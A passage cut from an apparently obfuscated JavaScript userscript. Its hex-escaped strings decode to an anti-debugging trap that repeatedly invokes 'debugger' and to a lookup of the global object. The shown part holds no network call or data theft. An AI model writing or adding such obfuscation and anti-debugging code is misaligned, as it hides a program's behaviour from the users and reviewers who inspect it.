x74'+'\x69'+'\x6f'+'\x6e'));}else{(function(){return![];}['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x64'+'\x65'+'\x62'+'\x75'+('\x67'+'\x67'+'\x65'+'\x72'))['\x61'+'\x70'+'\x70'+'\x6c'+'\x79']('\x73'+'\x74'+'\x61'+'\x74'+'\x65'+'\x4f'+'\x62'+'\x6a'+'\x65'+'\x63'+'\x74'));}}_0x3cb227(++_0x3b2990);}}try{if('\x44'+'\x6d'+'\x6c'+'\x63'+'\x48'==='\x57'+'\x5a'+'\x55'+'\x6f'+'\x70'){result('\x30');}else{if(_0x50215f){if('\x62'+'\x63'+'\x4c'+'\x75'+'\x43'!=='\x4c'+'\x53'+'\x65'+'\x78'+'\x5a'){return _0x3cb227;}else{globalObject=Function('\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x28'+'\x66'+'\x75'+'\x6e'+'\x63'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x28'+'\x29'+'\x20'+('\x7b'+'\x7d'+'\x2e'+'\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72'+'\x28'+'\x22'+'\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x74'+'\x68'+'\x69'+'\x73'+'\x22'+'\x29'+'\x28'+'\x20'+'\x29')+('\x29'+'\x3b'))();}}else{if('\x49'+'\x46'+'\x77'+'\x64'+'\x78'!=='\x49'+'\x46'+'\x77'+'\x64'+'\x78'){GM_setValue('\x66'+'\x74',![]);}else{_0x3cb227(0x0);}}}}catch(_0x348706){}}
